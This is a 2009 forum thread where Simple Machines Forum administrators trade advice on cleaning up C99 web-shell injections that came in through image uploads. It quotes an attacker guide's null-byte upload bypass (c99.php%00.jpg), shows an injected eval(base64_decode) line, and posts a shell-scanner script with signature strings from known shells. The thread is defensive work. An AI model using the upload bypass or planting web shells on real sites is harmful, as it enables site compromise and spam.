Post by: cydewaze on May 18, 2009, 09:14:51 AM
Edit: Nevermind.  That line of code is definitely NOT supposed to be there.  Time for a reinstall :(
Title: Re: Hacked, script injection
Post by: Niklas_ on May 18, 2009, 09:22:03 AM
The ultimate purpose seems to be linkspam... The hack adds loads of hidden links on your forum....

OK, thats kind of a relieve to me because it means that I can get rid of it without having any persistent damage done to my Board.

So far, all we know as of now is that there is code injected into random, or seemingly random, php files. Also, there have been reports of some database tables getting injected as well.
How do I know if my tables got injected? I have about 300k Posts and 3k Users I can't check everything by myself...
Title: Re: Hacked, script injection
Post by: Zero_Panzer on May 18, 2009, 09:39:05 AM
I'd like to know too Niklas_ but I'm not sure what to tell you.
BUT!
It also can get to your root site
Say you have www.mysite.com/forums/
If you have any pages (HTML, PHP, etc) make sure you REMOVE THE CODE IN THERE!
If the bot got through to you then it also got to the main site. If not, CHECK TO BE SURE!!!
It got to mine. :( BUT! I have a backup of the mainsite :D
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 18, 2009, 10:01:07 AM
lord, I just checked this morning and that code is on every single php file. I have subdreamer for the portal and several word press blogs and it's in all of them

I guess I have to go through each file manually and remove the code.

I did run a virus scan on my whole site and it said it showed no virus but I still don't trust this
Title: Re: Hacked, script injection
Post by: Zero_Panzer on May 18, 2009, 10:32:58 AM
lord, I just checked this morning and that code is on every single php file. I have subdreamer for the portal and several word press blogs and it's in all of them

I guess I have to go through each file manually and remove the code.

I did run a virus scan on my whole site and it said it showed no virus but I still don't trust this

Someone's bypassing using Bots Simple Machine forums and using them and their root sites (www.blah.com) whatever is before /forum/ to create spam or do whatever they want. My site's email was accessed and be sure to check for NEW files that we're created.

I had one called "help.php" created, I know I didn't put it there and if I went to it it bypassed my FTP and had a single page view of everything that was on the site and basically was a .php version of an FTP page. The only way that I found works to delete it is to open the help.php and use it to remove itself.

Hope this more amount of information helps.

Also, I looked in my logs (for the emails sent out) and the email address that it used was: BlackC00de@hotmail.com
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 18, 2009, 10:43:59 AM
I don't see a help.php file in my files. But I will go over it and be sure it isn't hidden in some folder I haven't looked in yet

I can't access the admin panel of my subdreamer section so I am reinstalling those files. I have one Word Press blog that seems to be messed up but the others look ok. For now


this is truly a mess. I'll be working on this all week I guess

My email seems to be clean..that's a good thing
Title: Re: Hacked, script injection
Post by: Niklas_ on May 18, 2009, 10:52:14 AM
OK, I did delete (nearly) all of the files on my webspace and uploaded a Backup. (except of htaccess and Settings.php)

Next I created a new Backup from my Database and was pretty scared because it differd to an old Backup in 20MB! (about 1/4) so I compared the two backups only looking at the differences using the linx command line tool diff:
Code: [Select]
diff -E -b -w -B -a --text --suppress-common-lines *old_backup*.sql *new_backup*.sql > diff.txt

In the end it turned out that most of the differences were error-logs which. I did not check every other entry but I for the smf_messages entries I did check I could not find anything that should not be there....

So now I am going to put my Forum back online (disabling avatar upload for new Members (Members that are not in specific groups), disabling new attachments and not allowing members to choose a template other than my default template. 
Title: Re: Hacked, script injection
Post by: Jorin on May 18, 2009, 12:01:33 PM
Is there any risk that modifications like the smf gallery can be unsafe to use in that way?
Title: Re: Hacked, script injection
Post by: jackulator on May 18, 2009, 01:17:04 PM
got me too - avatars missing, I look through php files and they all have the same line at the top now:

<?php /**/eval(base64_decode('................alphanumeric jibberish...............')); ?>

Title: Re: Hacked, script injection
Post by: jackulator on May 18, 2009, 01:39:09 PM
does everyone think this hacker went to a bunch of random SMF sites and did an sql-injection, or might it be possible that the section in admin that gives you updates from SMF was somehow hacked?

every php file on my site has that line in my previous post in it - not just the smf folder, so I don't know...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 01:40:43 PM
does everyone think this hacker went to a bunch of random SMF sites and did an sql-injection, or might it be possible that the section in admin that gives you updates from SMF was somehow hacked?
Neither - it has been established here, that this was done with a file upload...
Title: Re: Hacked, script injection
Post by: jackulator on May 18, 2009, 01:50:28 PM
here's the IP I had for the krisbarteo guy: 94.142.129.147

is this the same IP everyone else found? if he was dumb enough not to use a proxie I think a call to his ISP is in order - at the very least...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 01:53:18 PM
Looks familiar...
Title: Re: Hacked, script injection
Post by: robone on May 18, 2009, 02:07:10 PM
Mine had a link to "Luxorplay" posted in each php file. I checked most of the PHP files, and deleted the links, but I am still finding them in the help files.

From what I understand about C99Shell is that once they have access to your site, they can do a bulk add to all the php files. I had a look at the software, because a friend of mine managed to make a copy of it when he was infected, and it is powerful.

I don't think it was included with any upgrade. It gets in via uploaded avatars or attachments. And yes, again from what I understand, they try and see how many sites they can infect, so they identify all the smf sites and hack away.

I would look for the C99shell on your site, if you have been hacked, because if you have not found it, it i still there waiting for them to come back. As mentioned previously, I had 2 copies of it on mine. I was happy when I found the 1st one, and almost gave up looking, but then found the next one.
Title: Re: Hacked, script injection
Post by: MrPhil on May 18, 2009, 02:20:27 PM
I would look for the C99shell on your site, if you have been hacked

I have some custom scripts to scan my site for common hacks (base64, etc.). Is there any consistent pattern that I could look for to detect the C99shell?
Title: Re: Hacked, script injection
Post by: robone on May 18, 2009, 02:55:09 PM
I am looking for a script to do exactly that.

I have seen scripts (search google) that look for C99shell and some other names, but, they change the name, so you need a script that will open each php file and check the code.

See http://www.viruslist.com/en/viruses/encyclopedia?virusid=188613     

The file is 229051 bytes in size, so you need a script that will search all the files for a php that size


There is another site that may help. http://www.elitehackers.info/forums/showthread.php?t=17712

See post #4

I must admit, I actually do not understand what they are saying
Title: Re: Hacked, script injection
Post by: MrPhil on May 18, 2009, 04:53:31 PM
The file is 229051 bytes in size, so you need a script that will search all the files for a php that size

That wouldn't be hard to do (ls -alR | grep "229051"), but is it sufficient? Can this malware be trivially changed to be a slightly different size?

Quote
I must admit, I actually do not understand what they are saying

As best I can tell, PHP includes (and presumably requires) can be given a full URL rather than just a local file. In PHP 5 the inclusion of a URL is off by default, but it can be tricked into doing so? Anyway, it's not clear from the post whether this is something that C99shell does, or if it's something that is foisted on SMF's includes. Since SMF doesn't (AFAIK) include as names strings from user input, that shouldn't be a problem. I don't know if it uses a $_GET anywhere to bring in a file name (or URL) to be included -- I don't recall ever seeing such a thing. So, presumably, C99shell is doing this include or require to bring in a URL. Apparently, C99shell has to be "planted" in a separate operation first.
Title: Re: Hacked, script injection
Post by: Faded Glory on May 18, 2009, 07:49:05 PM
here's the IP I had for the krisbarteo guy: 94.142.129.147

is this the same IP everyone else found? if he was dumb enough not to use a proxie I think a call to his ISP is in order - at the very least...

That IP goes back to RIPE. It may as well be a proxy for all the good it does to try to track it. RIPE could care less.
Title: Re: Hacked, script injection
Post by: Ben_S on May 18, 2009, 07:52:21 PM
Err, do you even know what RIPE is, why would RIPE care. Lookup the IP with RIPE and see who its actually allocated to, odds are though it's a zombie anyway.
Title: Re: Hacked, script injection
Post by: Antechinus on May 18, 2009, 08:02:59 PM
The IP tracks to Latvia. I checked. Personally I banned a substantial IP range last night. 
Title: Re: Hacked, script injection
Post by: Night09 on May 18, 2009, 09:42:50 PM
The Idiot tried to register on my forums but were on member approval so i have set this ban for the ip: 94.142.129.*

If he comes back i will change it to the 129 octlet instead.
Title: Re: Hacked, script injection
Post by: Faded Glory on May 19, 2009, 01:46:59 AM
Err, do you even know what RIPE is, why would RIPE care. Lookup the IP with RIPE and see who its actually allocated to, odds are though it's a zombie anyway.

Yes my dear I do understand what RIPE is. Because I know everyone is under a bit of strain, I won't take offense at being talked down to.

Now if anyone can track it further or make a complaint to them concerning this character, I would love to know how to do it too!

% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.
% Information related to '94.142.129.128 - 94.142.129.255'
inetnum:         94.142.129.128 - 94.142.129.255
netname:         CSSGROUP-NET
descr:           SIA "CSS GROUP" hosting
org:             ORG-SG55-RIPE
country:         LV
admin-c:         CGN-RIPE
tech-c:          CGN-RIPE
status:          ASSIGNED PA
mnt-by:          CSSGROUP-MNT
source:          RIPE # Filtered
organisation:    ORG-SG55-RIPE
org-name:        SIA "CSS GROUP"
org-type:        LIR
address:         SIA "CSS GROUP"
                Caunas 7A-26
                LV-4101 Cesis
                LATVIA
phone:           +371 67 404544
fax-no:          +371 67 414545
admin-c:         DJ1401-RIPE
mnt-ref:         CSSGROUP-MNT
mnt-ref:         RIPE-NCC-HM-MNT
mnt-by:          RIPE-NCC-HM-MNT
source:          RIPE # Filtered
role:            CSS GROUP NOC
address:         Caunas 7A-26, Cesis, LV-4101, Latvia
phone:           +371 67 404544
fax-no:          +371 67 414545
abuse-mailbox:   noc@cssgroup.lv
admin-c:         DJ1401-RIPE
tech-c:          AC13043-RIPE
nic-hdl:         CGN-RIPE
source:          RIPE # Filtered
% Information related to '94.142.128.0/21AS48662'
route:           94.142.128.0/21
descr:           SIA "CSS GROUP"
origin:          AS48662
mnt-by:          CSSGROUP-MNT
source:          RIPE # Filtered
Title: Re: Hacked, script injection
Post by: JBlaze on May 19, 2009, 01:49:46 AM
Thanks Faded. But that's as far as we get.

So far, I've been able to track it down to a certain area of Latvia, but that doesn't really help. It could alse very well be a proxy.

Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 19, 2009, 02:04:12 AM
No proxy on 94.142.129.147

IP address: 94.142.129.147
IP country code: LV 
IP address country:  Latvia 
IP address state: Césu 
IP address city: Cesis 
IP address latitude: 57.299999 
IP address longitude: 25.250000 
ISP of this IP: SIA CSS GROUP 
Organization: SIA CSS GROUP hosting
 
Local time in Latvia: 2009-05-19 09:02

organisation: ORG-SG55-RIPE
org-name: SIA "CSS GROUP"
org-type: LIR
address: SIA "CSS GROUP"
Caunas 7A-26
LV-4101 Cesis
LATVIA
phone: +371 67 404544
fax-no: +371 67 414545
admin-c: DJ1401-RIPE
mnt-ref: CSSGROUP-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered

role: CSS GROUP NOC
address: Caunas 7A-26, Cesis, LV-4101, Latvia
phone: +371 67 404544
fax-no: +371 67 414545
abuse-mailbox: noc@cssgroup.lv

:D
Title: Re: Hacked, script injection
Post by: Faded Glory on May 19, 2009, 02:06:14 AM
Thank you JBlaze.

I was one of the lucky ones that had the StopForumSpam on my site and he didn't even get to register.

I feel really bad for all of those he did get to and hit so hard.

Again Let me say I am truly in awe of how much time and effort you and the rest of the team have put into this problem, and helping those that got hit to restore their forums.

I know of no other software operation that goes to such lengths and not get paid for it!

So if someone forgets to say thanks I have just said it for them!
Title: Re: Hacked, script injection
Post by: thebofh on May 19, 2009, 05:01:42 AM
I just had Fire768 from 115.146.185.14 blocked by the stop spam mod.
Title: Re: Hacked, script injection
Post by: mrsax2000 on May 19, 2009, 06:23:59 AM
I'd like to review the table in MySQL, but I don't have a tool for viewing the database. What do you recommend?
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 19, 2009, 06:25:57 AM
Are you sure you don't have any means to access it?
Most hosts provide you with phpmyadmin as a part of your hosting control panel,
or as a separate script you can access.

If you really don't have any, phpmyadmin is relatively easy to setup by yourself as well,
just make sure to never leave in a web accessible folder for more than you have to - as it can be a major security risk.
Title: Re: Hacked, script injection
Post by: robone on May 19, 2009, 07:49:07 AM
Found the following document : http://209.85.229.132/search?q=cache:jyfd9Npg9dsJ:forum.eviloctal.com/attachment.php%3Faid%3D5197+how+to+find+c99.php+on+website&cd=26&hl=en&ct=clnk

The document is called "The Website Attack Guide" and it goes into some interesting things, but I will extract how they get C99 onto a website. It looks like that is how they got it onto mine:

First of all, what is a 'Null Byte'? A null character/null byte/null terminator is a character with a value of zero that is shown in the ASCII Charest. And, in programming languages (php included) the null byte is used as, what's know as, a 'string terminator'. When the null byte is read the string ends. The null byte is represented with '%00' in php. We are able to harness the 'power' of the null byte to trick a picture upload form into letting us upload our own phpshell. There are allot of websites with image uploading features, so they are not hard to find. You can use the Google dork: "Upload Image" to find some of them. Now that we have a target we are able to start exploiting.

Go to your targets upload page and click the 'Browse' button and navigate to a php shell. Just for the sake of Proof of Concept, try to upload this file normally. You will get an error such as:"We're sorry, but the file you entered is using an extension that is not alloud. Images only please!"We see from this that only images are supported - and a regular php shell will not work.Let's browse to our shell again, but this time we will change the upload bar to look like this, adding in the nullbyte character: C:\c99.php%00.jpg

When the script checks if our file it will see the .jpg and 'say' "Yep, looks like an image to me" and upload it. Fortunately for us, when the file is actually uploaded it is uploaded with the .php extension because the null byte terminates anything after that.

If it worked we will see:"Thank you for uploading your pictures - view your file at /c99.php"This concludes the first null byte exploitation article i will right. The second will be on exploiting cgi files using the null byte


So, it is important to make sure that you restrict access to being able to upload avatars or attachments until you have established that the member is not someone trying to get into your system.


Found this shell php scanner    http://www.darkmindz.com/codebase/php-simple-php-shell-scanner-num508.html

Will someone who knows php tell me if this is okay to use?? And do you think it will work??
Title: Re: Hacked, script injection
Post by: demount on May 19, 2009, 10:15:12 AM
It is not neccessary to ban anything, because 94.142.129.147 and other IPs are simple Dedicated servers, working under Win2003(sometimes winxp). There is opened port 3389, MS-terminal service. That guy just launched an attack through(or maybe from) that workstations by remote desktop. Also there is a possibility, that he used a chain of such workstations, so detecting his real IP is a difficult task.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 19, 2009, 10:23:47 AM
<<< The document is called "The Website Attack Guide" and it goes into some interesting things, but I will extract how they get C99 onto a website. It looks like that is how they got it onto mine: >>>

This sounds like what that zaphodb777 guy was talking about. Has anybody looked at the outfit he linked to? It actually looks legit to me and possibly helpful. Can't fault a guy for pluggin his wares if they're above board.
Title: Re: Hacked, script injection
Post by: bri on May 19, 2009, 10:35:18 AM
If you are describing the methods you are using to combat the terrorists, you may want to not link your forum in your sig line... ;)
Title: Re: Hacked, script injection
Post by: mghq on May 19, 2009, 09:29:28 PM
Me and my friend did some reseacrhing on kris.
Here is some
He is running Microsoft Windows Server 2003 with Service Pack 2
He has port 3389 which is Microsoft RDP.
And from our scan he breaks into networks
Title: Re: Hacked, script injection
Post by: mghq on May 19, 2009, 09:36:19 PM
He/she is also a linux hacker.
http://www.ip-adress.com/ip_tracer/94.142.129.147
Title: Re: Hacked, script injection
Post by: rusgard on May 20, 2009, 03:18:57 AM
Hi,
i've also the krisbarteo in my board (v1.18), registered at 17. May 2009.

I searched for style.css.php and other files too. But i found nothing.
The content of the *.php files looks also fine.

What can i do, to check if i've a clean installation without corruption?

Many Thanks
rusgard

EDIT:
I found krisbarteo in another Board (v2.0 RC1 - hosted by myself) too!!
But nothing changed...no new files,  php-files looking well....
Title: Re: Hacked, script injection
Post by: Night09 on May 20, 2009, 08:06:40 AM
Quote
I found krisbarteo in another Board (v2.0 RC1 - hosted by myself) too!!
But nothing changed...no new files,  php-files looking well....

Its possible that he has tried to infect so many sites he hasnt had time to actually visit them all to do any damage yet.Although he could have a bot registering it may require him as a human to complete some of the hacking so having him register may not mean an automatic compromise.

It may be you have caught this in time and stopped him before he had chance to infect your site.
Title: Re: Hacked, script injection
Post by: Jorin on May 20, 2009, 08:11:10 AM
It may be you have caught this in time and stopped him before he had chance to infect your site.

Let us hope he banned krisbarteo completely.  ;)
Title: Re: Hacked, script injection
Post by: rusgard on May 20, 2009, 08:24:05 AM
It may be you have caught this in time and stopped him before he had chance to infect your site.

Let us hope he banned krisbarteo completely.  ;)

I banned him ;)
(i hope it's enough to ban the user...also i deactivated the avatar and theme functions...)
Title: Re: Hacked, script injection
Post by: robone on May 20, 2009, 08:45:38 AM
Further to my previous email, can anyone who knows php tell me if this script below will work to look for C99 PHP Shells and others, on the forum:

Code: [Select]
#!/usr/bin/php
<?php
/*
*    this script find some shell like
*    c99, c100, r57, erne, Safe_Over
*    and try to find some of unknow shell searching specific words this can be
*    not safe
*
*      how to use:
*      the script don't need no-one of these parameter thay are facoltative
*      -e Y/N enable disable eusristic mode (default is enable)
*      -p a number 1-100 , it's the percentual of word that must be find into the file to warm the euristic mode
*      -f check a single file
*     -d check a single dir (normaly the program is recursive chek ALL file )
*        powered by Dr. nefasto
*/
$euristic__ = array("fopen""file(""file_get_contents""sql""opendir""perms""port""eval""system""exec""rename""copy""delete""hack""(\$_""phpinfo""uname""glob""is_writable""is_readable""get_magic_quotes_gpc()""move_uploaded_file""\$dir""& 00""get");
$word__ = array(
            
"c99" => array("c999shexit();""setcookie(\"c999sh_surl\");""c999_buff_prepare();"),
            
"c100" => array("\$back_connect_c=\"f0VMRgEBAQA""function myshellexec(\$command) {""tEY87ExcilDfgAMhwqM74s6o"),
            
"r57" => array("if(strpos(ex(\"echo abcr57\"),\"r57\")!=3)""function ex(\$cfe)""\$port_bind_bd_c=\"I2luY2x1ZGUg"),
            
"erne"=> array("function unix2DosTime(\$unixtime = 0)""eh(\$errno, \$er""\$mtime=@date(\"Y-m-d H:i:s\",@filemti"),
            
"Safe_Over" => array("function walkArray(\$array){""function printpagelink(\$a, \$b, \$link = \"\")""if (\$cmd != \"downl\")"),
            
"cmd_asp" => array("   ' -- Read th""ll oFileSys.D""Author: Maceo")
        );
//the script work
$euristic_active true;
$euristic_sens 40;
for (
$i 1$i $argc$i++)
{
    if (
$argv[$i] == "-h")
        
help($argv[0]);
    elseif(
$argv[$i] == "-e")
    {
        if (
$argv[$i+1] == "Y"$euristic_active true;
        if (
$argv[$i+1] == "N"$euristic_active false;
    }
    elseif(
$argv[$i] == "-p")
        
$euristic_sens $argv[$i+1];
    elseif(
$argv[$i] == "-d")
    {
        
dir_scan($argv[$i+1]);    
        exit;
    }
    elseif(
$argv[$i] == "-f")
    {
        
a($argv[$i+1]);    
        exit;
    }
}
dir_scan(".");
function 
dir_scan($name)
{
    if (!
is_dir($name))
        echo 
"$name is not a dir\n"
    if (
$o = @opendir($name))
    {
        while(
false !== ($file readdir($o)))
        {
            if (
$file == '.' or $file == '..' or $file == basename(__file__)){    continue;}
            else if (
is_dir($name."/".$file)){dir_scan($name."/".$file);}
            else
                
a($name."/".$file);
        }
        
closedir($o);
    }
    else
        echo 
"i can't open $name dir\n";
}
function 
a($file)
{
    global 
$euristic_active;
    global 
$euristic_sens;
    if (
$l file_get_contents($file))
    {
        if ( 
$shell check($l))
        {
            echo 
"[DANGER] word_list > ".$file."\tprobably ".$shell." shell\n";
        } 
        else if (
$euristic_active)
            if (
$t check_euristic($l)   and $t $euristic_sens)
            {    
                echo 
"[_ALERT] euristic $t%> ".$file."\tprobably is a shell\n";
            }
    }
    else
    {
        echo 
"i can't open $file file\n";
    }
}
function 
check($string)
{
    
$check 0;
    global 
$word__;
    foreach(
$word__ as $shell => $code)
        foreach(
$code as $microcode)
            if (
stripos($string$microcode) !== false)
            {
                
$check ++;
                if (
$check == 3) return $shell;
            }
    return 
false;
}
function 
check_euristic($string)
{
    global 
$euristic__;
    
$check 0;
    foreach(
$euristic__ as $code)
        if (
stripos($string$code) !== false)
            
$check++;
    return 
intval(($check 100) / count($euristic__));
}
function 
help($me)
{
    echo     
"Dr. nefasto shell scanner\n".
        
"$me {-e [euristic method default = Y] Y/N   -p [[0-100] euristic sensibility fewer == most feeble ]   [-d [directory] / -f [file] ]}\n".
        
"exemple: $me -e N -d /tmp\n"
        
;
    exit;
}
?>


I am a bit scared to use, as I do not know what the outcome will be.

But if it works, this will be what should be run every so often to ensure a site is safe, because as mentioned previously, I found two C99 shells on my site and am still trying to clean up the code inserted in all my php files.
Title: Re: Hacked, script injection
Post by: Sarge on May 20, 2009, 09:12:12 AM
Further to my previous email, can anyone who knows php tell me if this script below will work to look for C99 PHP Shells and others, on the forum:

I don't think this script will work.
Title: Re: Hacked, script injection
Post by: robone on May 20, 2009, 09:29:08 AM
Okay......I accept your expertise....... but someone has posted it on a site as a means of detecting PHP shells such as C99, so there must be some validity to it.

Either it works, or it needs tweeking to make it work, or it is pure garbage, or it will add to ones problems.

Is there anything in it that will harm my forum?? If not, I will give it a bash and see what happens.

So, comments will be appreciated
Title: Re: Hacked, script injection
Post by: Sarge on May 20, 2009, 09:56:20 AM
robone, what I'm trying to say is that the script you posted does not work on the particular kind of exploit that is being discussed here. It is a modified and "encrypted" copy of the c99 shell, so I think that the script you posted will not detect it at all.

But if you want to give it a try, I suggest getting a full backup first...

I happen to know that a cleaning script for this specific attack is being worked on, so I'll let you know if/when I have more info.
Title: Re: Hacked, script injection
Post by: robone on May 20, 2009, 10:13:19 AM
Okay..thanks...I will wait
Title: Re: Hacked, script injection
Post by: M-DVD on May 20, 2009, 10:53:18 AM
I banned him ;)
(i hope it's enough to ban the user...also i deactivated the avatar and theme functions...)

This user have other alias. But, yes, is better ban him, but don't close the eyes :P

You can, not disable the upload avatar, instead you can change the dir attachments. Afaik this is very (100%) effective.

The theme functions, enabled or disabled is equal.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 20, 2009, 10:55:00 AM
You can not disable the upload avatar, instead you can change the dir attachments. afaik this is very effective.
No - changing dir would probably have 0 effect on this.

Quote
The theme functions, enabled or disabled is equal.
No. The theme functions play a role in this.

If you've already experienced the hack, i reccommend virus scanning your computer as well.

Again, i'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.
Title: Re: Hacked, script injection
Post by: Geri Lx on May 20, 2009, 11:07:38 AM
Hi.
My forum was infected too. We cleaned the files and now we got no errors. Also banned the ip's, closed the avatar uploading, and the theme changing.
This topic was very helpful. Thanks to everybody for the efforts.

I am writing now because I wan't to say...Be aware! He is coming back.

I had today three vizits & login atempts from that Latvian IP.

Title: Re: Hacked, script injection
Post by: babjusi on May 20, 2009, 11:09:54 AM

I am writing now because I wan't to say...Be aware! He is coming back.

The patch will be released soon and it won''t matter anymore if he or whomever comes back.
Title: Re: Hacked, script injection
Post by: M-DVD on May 20, 2009, 11:32:22 AM
You can not disable the upload avatar, instead you can change the dir attachments. afaik this is very effective.
No - changing dir would probably have 0 effect on this.

Afaik is very effective. Why? Because...

How the spammer make the inject if don't know the real attachment dir?

ie, How the spammer make a inject with a "correct attactment dir"?

Quote
The theme functions, enabled or disabled is equal.
No. The theme functions play a role in this.

I could do the inject and the "avatar inclusion" with the theme change functions disable

Yes, play a role in this, but this role don't is turned off if the changing functions theme is disabled  :)
Title: Re: Hacked, script injection
Post by: Jorin on May 20, 2009, 11:50:36 AM
We suggest the following to provide from krisbarteo:

- Don't allow members to choose a theme.
- Don't allow members to upload an avatar and upload an avatar from another server.
- Don't allow to attach any kind of pictures, such as BMP, GIF, JPEG, JPG, TIF, PNG.
- Disable modifications like a gallery (which allow to upload picture files).
- Change registration mode so an Administrator can proof new members.
- Ban the user "krisbarteo", "stilusmagic" and the e-mail-adress "stilusmagic@googlemail.com". If this users don't exist, create and ban them yourself.
- Check your webspace for unknown PHP files and check the SMF files for the code of krisbarteo.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 20, 2009, 11:55:53 AM
You can not disable the upload avatar, instead you can change the dir attachments. afaik this is very effective.
No - changing dir would probably have 0 effect on this.

Afaik is very effective.

How you make the inject if you don't know the real attachment dir?

ie, How you make a inject with a "correct attactment dir"?
I don't know this hack thoroughly, but I do tend to think - How does SMF know the correct attachment dir?
I'd think that when you get in in the first place, it's enough that SMF knows the location - you don't have to...
Quote
Quote
The theme functions, enabled or disabled is equal.
No. The theme functions play a role in this.
I could do the inject and the "avatar inclusion" with the theme change functions disable
Yes, play a role in this, but this role don't is turned off if the changing functions theme is disabled  :)
OK - I won't argue, as I said - I don't know the hack too thoroughly...

But still, I would suggest that everyone aknowledges the advice given by team members here - as they probably know exactly what they are talking about ;)
Title: Re: Hacked, script injection
Post by: mghq on May 20, 2009, 12:06:52 PM
Luckily my forum has not been attacked because my server is unreachable at the moment.
This hack works by him uploading an aproximant 1 pixel image which has php code in it. The php code then attacks and tries to create files and infect you other .php file
Title: Re: Hacked, script injection
Post by: Jorin on May 20, 2009, 12:28:57 PM
We already know this, thanks.  ;D
Title: Re: Hacked, script injection
Post by: M-DVD on May 20, 2009, 06:01:52 PM
Quote
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

The reason for this change is twofold:
1.) The pattern of the last SMF exploits has been alterations of prior exploits pertaining to poisoned attachments and avatars.  Rather than close one small hole, we are opting to close the possibility of this type of attack coming up again.
2.) IE6 will pretty much run just about anything injected into an image blindly without thinking twice about it.  This could infect your computer (as others alluded to above).

If you've already experienced the hack, i reccommend virus scanning your computer as well.

Again, i'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.

It's nice to know how you are working to fix this.

Currently are doing is testing, because the solution brings new problems and for several days on this.

A few days ago I made a "personal patch".
This patch/package in the first place "close the hole", and second (in all potentials sites) prevents to include files with unduly manipulating the url as this hacker.

Ie, everything you said in the quote (except the point 2), with the difference that I have not had any side effects.

Yes, I don't know how they are working, or, what they are doing, but if I can help, can tell me.
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 09:02:10 PM
Hi,

My forum has been hacked today by krisbarto he came online for about 1 minute and uploaded a image very small dot, but i only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from database and attachments folder and i am currently going though all php files, so far i have not found a line at the top but i have found this in the gallery php file :

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help
Title: Re: Hacked, script injection
Post by: Kindred on May 20, 2009, 09:09:27 PM
if you have read the thread, then you may note that we have discussed this...

if not, then the simple answer is NO, that is nto supposed to be there. Likely you will have to clean more than that one file, too...
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 09:17:11 PM
Thank You, I have read the entire thread, but as i am new to this i really wasn't sure and before i did anything i wanted to check with somebody that could confirm that it shouldn't be there.

I am checking all my php files now and so far that is the first one its in.

Thank You again
Title: Re: Hacked, script injection
Post by: mycousinvinny on May 20, 2009, 09:41:01 PM
I just banned krisbarteo from my site and altho we have been having some page load lagsand "can't connect to database erorrs"  recently i don't know if he had done any damage nor do i have a clue how to check is there any1 that can check my forum??

He did not have an avatar as far as i can tell!!

thanks very much

http://anything-goe.net/Forum

thanks again,

Vinny
Title: Re: Hacked, script injection
Post by: JBlaze on May 20, 2009, 09:42:39 PM
mycousinvinny, make sure the check all php files on line1 for a string of "base64_decode()"

If you have that on ANY file, please let us know and we will do what we can to help.
Title: Re: Hacked, script injection
Post by: vbgamer45 on May 20, 2009, 09:47:32 PM
Hi,

My forum has been hacked today by krisbarto he came online for about 1 minute and uploaded a image very small dot, but i only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from database and attachments folder and i am currently going though all php files, so far i have not found a line at the top but i have found this in the gallery php file :

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help

That one is safe I place that for copyright reasons says
Powered by Gallery For SMF  made by vbgamer45 http://www.smfhacks.com
Title: Re: Hacked, script injection
Post by: JBlaze on May 20, 2009, 09:48:47 PM
Way to get us all hyped up vb :)
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 10:07:28 PM
Hi,

My forum has been hacked today by krisbarto he came online for about 1 minute and uploaded a image very small dot, but i only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from database and attachments folder and i am currently going though all php files, so far i have not found a line at the top but i have found this in the gallery php file :

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help

That one is safe I place that for copyright reasons says
Powered by Gallery For SMF  made by vbgamer45 http://www.smfhacks.com

Thank You for letting me know.
Title: Re: Hacked, script injection
Post by: metallica48423 on May 20, 2009, 10:32:40 PM
For anyone who hasn't done so yet, 1.1.9 was released (http://www.simplemachines.org/community/index.php?topic=311899.0) tonight, patching this.   Please be sure to update your forums ASAP.

Thanks!

Edit: added link to the announcement topic.
Title: Re: Hacked, script injection
Post by: Sarge on May 20, 2009, 10:41:50 PM
1.1.9 was released tonight

/me says something about timezones ;)
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 10:55:18 PM
I've just updated to 1.1.9  :) Thanks for this

I have gone through half of my php files and i haven't found anything wrong yet also database is looking ok. I am still checking them though. Would it be possible that i have caught him in time and i won't find anything ?

Sorry to be a pain
Title: Re: Hacked, script injection
Post by: mycousinvinny on May 21, 2009, 08:30:30 AM
mycousinvinny, make sure the check all php files on line1 for a string of "base64_decode()"

If you have that on ANY file, please let us know and we will do what we can to help.

Thanks Jblaze. In laymans terms can you tell me how I do that??  I don't know Jack about where these files are thanks for your help. Also i have udated to 1.1.9 but had 3 errors my forum appears to be functioning properly.

